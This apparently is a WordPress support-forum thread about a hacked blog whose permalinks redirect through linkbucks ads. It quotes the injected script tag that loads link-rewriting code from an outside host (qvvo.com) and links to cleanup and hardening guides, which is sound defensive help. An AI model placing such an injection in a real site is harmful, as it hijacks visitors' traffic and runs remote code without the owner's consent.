Posted 2 years ago #
Recently when clicking on any permalink on my site, it is redirected to an ad that is hosted on linkbucks.com (example: http://acabc950.linkbucks.com/url/http://pileofsticks.com/blog/?p=76)
[Moderated -- Link nullified]
I'm not sure if this is a hack, if so how can I get rid of it? Please help!
Posted 2 years ago #
Yes, you have been hacked. You have to remove a script like this
<script type="text/javascript" src="http://www.qvvo.com/Webservices/jsParseLinks.aspx?id=acabc950"></script>
The problem is that it may be anywhere on your files. I would start with the main index.php
Posted 2 years ago #
Thank you, I did find it in the footer. There was also an additional filecheck.php which i've deleted for now.
How can I avoid this in the future?
Posted 2 years ago #
unfortunately, removing that code juist fixes you for now. If you have been hacked once, it means there is an open door somewhere. If you don't fix the problem, the hacks will come back. Here's some reading that may help
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
My Experiences with being hacked:
http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/
And when you're done:
http://codex.wordpress.org/Hardening_WordPress
This topic has been closed to new replies.
